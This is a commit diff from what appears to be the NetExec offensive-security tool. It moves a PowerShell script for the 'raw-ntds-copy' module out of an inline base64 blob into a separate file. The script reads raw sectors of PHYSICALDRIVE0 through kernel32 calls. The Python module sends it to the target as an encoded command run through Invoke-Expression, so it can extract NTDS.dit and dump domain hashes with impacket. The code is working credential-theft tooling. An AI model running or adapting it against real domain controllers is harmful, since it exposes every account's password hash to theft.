Skip to content

Commit 788ba90

Browse files
NeffIsBackNeffIsBack
committed
Move powershell script to file instead of b64 inline
1 parent f7fa1fa commit 788ba90

2 files changed

Lines changed: 110 additions & 4 deletions

File tree

nxc/data/raw_ntds_copy/raw_ntds_copy.ps1

Lines changed: 95 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
Add-Type -TypeDefinition @"
2+
using System;
3+
using System.Runtime.InteropServices;
4+
using Microsoft.Win32.SafeHandles;
5+
6+
public class CNativeMethods
7+
{
8+
public const uint GENERIC_READ = 0x80000000;
9+
public const uint OPEN_EXISTING = 3;
10+
public const uint FILE_SHARE_READ = 0x00000001;
11+
public const uint FILE_SHARE_WRITE = 0x00000002;
12+
public const uint FILE_SHARE_DELETE = 0x00000004;
13+
14+
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
15+
public static extern SafeFileHandle CreateFile(
16+
string lpFileName,
17+
uint dwDesiredAccess,
18+
uint dwShareMode,
19+
IntPtr lpSecurityAttributes,
20+
uint dwCreationDisposition,
21+
uint dwFlagsAndAttributes,
22+
IntPtr hTemplateFile
23+
);
24+
25+
[DllImport("kernel32.dll", SetLastError = true)]
26+
public static extern bool ReadFile(
27+
SafeFileHandle hFile,
28+
byte[] lpBuffer,
29+
uint nNumberOfBytesToRead,
30+
out uint lpNumberOfBytesRead,
31+
IntPtr lpOverlapped
32+
);
33+
34+
[DllImport("kernel32.dll", SetLastError = true)]
35+
public static extern bool SetFilePointerEx(
36+
SafeFileHandle hFile,
37+
long lDistanceToMove,
38+
out long lpNewFilePointer,
39+
uint dwMoveMethod
40+
);
41+
}
42+
43+
public enum EMoveMethod : uint
44+
{
45+
Begin = 0,
46+
Current = 1,
47+
End = 2
48+
}
49+
"@
50+
Function read_disk{
51+
$offset = [long]$args[0]
52+
$size = [int]$args[1]
53+
try {
54+
$handle = [CNativeMethods]::CreateFile("\\.\PHYSICALDRIVE0",
55+
[CNativeMethods]::GENERIC_READ,
56+
[CNativeMethods]::FILE_SHARE_READ -bor [CNativeMethods]::FILE_SHARE_WRITE -bor [CNativeMethods]::FILE_SHARE_DELETE,
57+
[IntPtr]::Zero, [CNativeMethods]::OPEN_EXISTING, 0, [IntPtr]::Zero)
58+
59+
if ($handle.IsInvalid) {
60+
throw "Failed to create file handle"
61+
}
62+
63+
$moveToHigh = 0
64+
$success = [CNativeMethods]::SetFilePointerEx($handle, $offset, [ref]$moveToHigh, [EMoveMethod]::Begin)
65+
if (-not $success) {
66+
throw "Failed to set file pointer"
67+
}
68+
69+
$buffer = New-Object byte[] $size
70+
$bytesRead = 0
71+
$success = [CNativeMethods]::ReadFile($handle, $buffer, $size, [ref]$bytesRead, [IntPtr]::Zero)
72+
73+
if (-not $success) {
74+
throw "Failed to read file"
75+
}
76+
77+
$memoryStream = New-Object System.IO.MemoryStream
78+
$gzipStream = New-Object System.IO.Compression.GzipStream($memoryStream, [System.IO.Compression.CompressionMode]::Compress)
79+
$gzipStream.Write($buffer, 0, $buffer.Length)
80+
$gzipStream.Close()
81+
82+
$compressedBytes = $memoryStream.ToArray()
83+
$compressedBase64 = [Convert]::ToBase64String($compressedBytes)
84+
85+
Write-Output $compressedBase64
86+
} catch {
87+
Write-Error "An error occurred: $_"
88+
}
89+
90+
finally {
91+
if ($handle -and !$handle.IsInvalid) {
92+
$handle.Close()
93+
}
94+
}
95+
}

nxc/modules/raw-ntds-copy.py

Lines changed: 15 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
# raw-ntds-copy module for nxc
22
# Author of the module : Bilal Github:@0xb11a1, X:@0xcc00
33

4-
import base64
4+
from base64 import b64decode, b64encode
55
from os import makedirs
66
from os.path import join, abspath
77
from nxc.paths import TMP_PATH
@@ -12,6 +12,7 @@
1212
from io import BytesIO
1313
from impacket.examples.secretsdump import LocalOperations, NTDSHashes, SAMHashes
1414
from nxc.helpers.misc import validate_ntlm
15+
from nxc.helpers.powershell import get_ps_script
1516

1617

1718
class NXCModule:
@@ -62,6 +63,16 @@ class NXCModule:
6263
0x100: "$LOGGED_UTILITY_STREAM",
6364
}
6465

66+
def __init__(self):
67+
ps_script = ""
68+
with open(get_ps_script("raw_ntds_copy/raw_ntds_copy.ps1")) as psFile:
69+
for line in psFile:
70+
if line.startswith("#") or line.strip() == "":
71+
continue
72+
else:
73+
ps_script += line.strip() + "\n"
74+
self.ps_script_b64 = b64encode(ps_script.encode("UTF-16LE")).decode("utf-8")
75+
6576
@dataclass
6677
class MFA_sector_properties:
6778
filename: str = ""
@@ -79,10 +90,10 @@ def read_from_disk(self, offset, size):
7990
fixed_size = size // 512 + 512 if size % 512 != 0 else size
8091
# scary base64 powershell code :)
8192
# This to read the PhysicalDrive0 file
82-
Get_data_script = f"""powershell.exe -c "$base64Cmd = 'IABBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIALgBTAGEAZgBlAEgAYQBuAGQAbABlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABDAE4AYQB0AGkAdgBlAE0AZQB0AGgAbwBkAHMACgB7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAHUAaQBuAHQAIABHAEUATgBFAFIASQBDAF8AUgBFAEEARAAgAD0AIAAwAHgAOAAwADAAMAAwADAAMAAwADsACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAYwBvAG4AcwB0ACAAdQBpAG4AdAAgAE8AUABFAE4AXwBFAFgASQBTAFQASQBOAEcAIAA9ACAAMwA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAHUAaQBuAHQAIABGAEkATABFAF8AUwBIAEEAUgBFAF8AUgBFAEEARAAgAD0AIAAwAHgAMAAwADAAMAAwADAAMAAxADsACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAYwBvAG4AcwB0ACAAdQBpAG4AdAAgAEYASQBMAEUAXwBTAEgAQQBSAEUAXwBXAFIASQBUAEUAIAA9ACAAMAB4ADAAMAAwADAAMAAwADAAMgA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAHUAaQBuAHQAIABGAEkATABFAF8AUwBIAEEAUgBFAF8ARABFAEwARQBUAEUAIAA9ACAAMAB4ADAAMAAwADAAMAAwADAANAA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAHQAcgB1AGUALAAgAEMAaABhAHIAUwBlAHQAIAA9ACAAQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABTAGEAZgBlAEYAaQBsAGUASABhAG4AZABsAGUAIABDAHIAZQBhAHQAZQBGAGkAbABlACgACgAgACAAIAAgACAAIAAgACAAcwB0AHIAaQBuAGcAIABsAHAARgBpAGwAZQBOAGEAbQBlACwAIAAKACAAIAAgACAAIAAgACAAIAB1AGkAbgB0ACAAZAB3AEQAZQBzAGkAcgBlAGQAQQBjAGMAZQBzAHMALAAgAAoAIAAgACAAIAAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwBoAGEAcgBlAE0AbwBkAGUALAAgAAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFMAZQBjAHUAcgBpAHQAeQBBAHQAdAByAGkAYgB1AHQAZQBzACwAIAAKACAAIAAgACAAIAAgACAAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBEAGkAcwBwAG8AcwBpAHQAaQBvAG4ALAAgAAoAIAAgACAAIAAgACAAIAAgAHUAaQBuAHQAIABkAHcARgBsAGEAZwBzAEEAbgBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAAaABUAGUAbQBwAGwAYQB0AGUARgBpAGwAZQAKACAAIAAgACAAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAHQAcgB1AGUAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUgBlAGEAZABGAGkAbABlACgACgAgACAAIAAgACAAIAAgACAAUwBhAGYAZQBGAGkAbABlAEgAYQBuAGQAbABlACAAaABGAGkAbABlACwAIAAKACAAIAAgACAAIAAgACAAIABiAHkAdABlAFsAXQAgAGwAcABCAHUAZgBmAGUAcgAsACAACgAgACAAIAAgACAAIAAgACAAdQBpAG4AdAAgAG4ATgB1AG0AYgBlAHIATwBmAEIAeQB0AGUAcwBUAG8AUgBlAGEAZAAsACAACgAgACAAIAAgACAAIAAgACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAE4AdQBtAGIAZQByAE8AZgBCAHkAdABlAHMAUgBlAGEAZAAsACAACgAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAATwB2AGUAcgBsAGEAcABwAGUAZAAKACAAIAAgACAAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAHQAcgB1AGUAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBlAHQARgBpAGwAZQBQAG8AaQBuAHQAZQByAEUAeAAoAAoAIAAgACAAIAAgACAAIAAgAFMAYQBmAGUARgBpAGwAZQBIAGEAbgBkAGwAZQAgAGgARgBpAGwAZQAsACAACgAgACAAIAAgACAAIAAgACAAbABvAG4AZwAgAGwARABpAHMAdABhAG4AYwBlAFQAbwBNAG8AdgBlACwAIAAKACAAIAAgACAAIAAgACAAIABvAHUAdAAgAGwAbwBuAGcAIABsAHAATgBlAHcARgBpAGwAZQBQAG8AaQBuAHQAZQByACwAIAAKACAAIAAgACAAIAAgACAAIAB1AGkAbgB0ACAAZAB3AE0AbwB2AGUATQBlAHQAaABvAGQACgAgACAAIAAgACkAOwAKAH0ACgAKAHAAdQBiAGwAaQBjACAAZQBuAHUAbQAgAEUATQBvAHYAZQBNAGUAdABoAG8AZAAgADoAIAB1AGkAbgB0AAoAewAKACAAIAAgACAAQgBlAGcAaQBuACAAPQAgADAALAAKACAAIAAgACAAQwB1AHIAcgBlAG4AdAAgAD0AIAAxACwACgAgACAAIAAgAEUAbgBkACAAPQAgADIACgB9AAoAIgBAAAoARgB1AG4AYwB0AGkAbwBuACAAcgBlAGEAZABfAGQAaQBzAGsAewAKAAoACgAkAG8AZgBmAHMAZQB0ACAAPQAgAFsAbABvAG4AZwBdACQAYQByAGcAcwBbADAAXQAKACQAcwBpAHoAZQAgAD0AIABbAGkAbgB0AF0AJABhAHIAZwBzAFsAMQBdAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAGgAYQBuAGQAbABlACAAPQAgAFsAQwBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAKAAiAFwAXAAuAFwAUABIAFkAUwBJAEMAQQBMAEQAUgBJAFYARQAwACIALAAgAAoAIAAgACAAIAAgACAAIAAgAFsAQwBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAF0AOgA6AEcARQBOAEUAUgBJAEMAXwBSAEUAQQBEACwAIAAKACAAIAAgACAAIAAgACAAIABbAEMATgBhAHQAaQB2AGUATQBlAHQAaABvAGQAcwBdADoAOgBGAEkATABFAF8AUwBIAEEAUgBFAF8AUgBFAEEARAAgAC0AYgBvAHIAIABbAEMATgBhAHQAaQB2AGUATQBlAHQAaABvAGQAcwBdADoAOgBGAEkATABFAF8AUwBIAEEAUgBFAF8AVwBSAEkAVABFACAALQBiAG8AcgAgAFsAQwBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAF0AOgA6AEYASQBMAEUAXwBTAEgAQQBSAEUAXwBEAEUATABFAFQARQAsACAACgAgACAAIAAgACAAIAAgACAAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIABbAEMATgBhAHQAaQB2AGUATQBlAHQAaABvAGQAcwBdADoAOgBPAFAARQBOAF8ARQBYAEkAUwBUAEkATgBHACwAIAAwACwAIABbAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8AKQAKAAoAIAAgACAAIABpAGYAIAAoACQAaABhAG4AZABsAGUALgBJAHMASQBuAHYAYQBsAGkAZAApACAAewAKACAAIAAgACAAIAAgACAAIAB0AGgAcgBvAHcAIAAiAEYAYQBpAGwAZQBkACAAdABvACAAYwByAGUAYQB0AGUAIABmAGkAbABlACAAaABhAG4AZABsAGUAIgAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAG0AbwB2AGUAVABvAEgAaQBnAGgAIAA9ACAAMAAKACAAIAAgACAAJABzAHUAYwBjAGUAcwBzACAAPQAgAFsAQwBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAF0AOgA6AFMAZQB0AEYAaQBsAGUAUABvAGkAbgB0AGUAcgBFAHgAKAAkAGgAYQBuAGQAbABlACwAIAAkAG8AZgBmAHMAZQB0ACwAIABbAHIAZQBmAF0AJABtAG8AdgBlAFQAbwBIAGkAZwBoACwAIABbAEUATQBvAHYAZQBNAGUAdABoAG8AZABdADoAOgBCAGUAZwBpAG4AKQAKACAAIAAgACAAaQBmACAAKAAtAG4AbwB0ACAAJABzAHUAYwBjAGUAcwBzACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwAgACIARgBhAGkAbABlAGQAIAB0AG8AIABzAGUAdAAgAGYAaQBsAGUAIABwAG8AaQBuAHQAZQByACIACgAgACAAIAAgAH0ACgAKACAAIAAgACAAJABiAHUAZgBmAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAHMAaQB6AGUACgAgACAAIAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAMAAKACAAIAAgACAAJABzAHUAYwBjAGUAcwBzACAAPQAgAFsAQwBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQAaABhAG4AZABsAGUALAAgACQAYgB1AGYAZgBlAHIALAAgACQAcwBpAHoAZQAsACAAWwByAGUAZgBdACQAYgB5AHQAZQBzAFIAZQBhAGQALAAgAFsASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwApAAoACgAgACAAIAAgAGkAZgAgACgALQBuAG8AdAAgACQAcwB1AGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAB0AGgAcgBvAHcAIAAiAEYAYQBpAGwAZQBkACAAdABvACAAcgBlAGEAZAAgAGYAaQBsAGUAIgAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAG0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoACgAgACAAIAAgAAoAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAbQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBDAG8AbQBwAHIAZQBzAHMAKQAKAAoAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAIAAkAGIAdQBmAGYAZQByAC4ATABlAG4AZwB0AGgAKQAKACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAACgAgACAAIAAgACQAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAHMAIAA9ACAAJABtAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAuAFQAbwBBAHIAcgBhAHkAKAApAAoAIAAgACAAIAAKACAAIAAgACAAJABjAG8AbQBwAHIAZQBzAHMAZQBkAEIAYQBzAGUANgA0ACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBzACkACgAKACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgBhAHMAZQA2ADQACgAKACAAIAAgACAACgAKAH0AIABjAGEAdABjAGgAIAB7AAoAIAAgACAAIABXAHIAaQB0AGUALQBFAHIAcgBvAHIAIAAiAEEAbgAgAGUAcgByAG8AcgAgAG8AYwBjAHUAcgByAGUAZAA6ACAAJABfACIACgB9AAoACgBmAGkAbgBhAGwAbAB5ACAAewAKACAAIAAgACAAaQBmACAAKAAkAGgAYQBuAGQAbABlACAALQBhAG4AZAAgACEAJABoAGEAbgBkAGwAZQAuAEkAcwBJAG4AdgBhAGwAaQBkACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAaABhAG4AZABsAGUALgBDAGwAbwBzAGUAKAApAAoAIAAgACAAIAB9AAoAfQAKAH0ACgA=';$decodedCmd = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64Cmd)) + '; read_disk {offset} {fixed_size}'; Invoke-Expression $decodedCmd" """
83-
data_output = self.execute(Get_data_script, True)
93+
get_data_script = f"""powershell.exe -c "$base64Cmd = '{self.ps_script_b64}';$decodedCmd = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64Cmd)) + '; read_disk {offset} {fixed_size}'; Invoke-Expression $decodedCmd" """
94+
data_output = self.execute(get_data_script, True)
8495
self.logger.debug(f"{offset=},{size=},{fixed_size=}")
85-
compressed_bytes = base64.b64decode(data_output)[:size]
96+
compressed_bytes = b64decode(data_output)[:size]
8697
compressed_stream = BytesIO(compressed_bytes)
8798

8899
with gzip.GzipFile(fileobj=compressed_stream, mode="rb") as gzip_file:

0 commit comments

Comments
 (0)